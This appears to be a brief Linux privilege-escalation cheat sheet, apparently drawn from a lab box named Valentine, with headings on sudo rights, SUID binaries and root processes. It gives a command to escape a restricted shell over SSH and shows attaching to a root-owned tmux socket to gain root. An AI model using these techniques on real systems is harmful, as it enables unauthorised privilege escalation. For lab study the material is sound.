Linux
Cheatsheet



Sudo Rights (sudo -l)

SUID (Set user ID) Binaries

rbash (restricted shell)
SSH login to bypass the loading of profile and access proper bash
ssh [email protected] -t "bash --noprofile"
Processes executed by Root
TMUX session
hype@Valentine:/dev/shm$ ls -la /.devs/dev_sess
srw-rw---- 1 root hype 0 Apr 27 01:12 /.devs/dev_sess
hype@Valentine:/dev/shm$ groups
hype cdrom dip plugdev sambashare
tmux -S /.devs/dev_sess
Last updated
Was this helpful?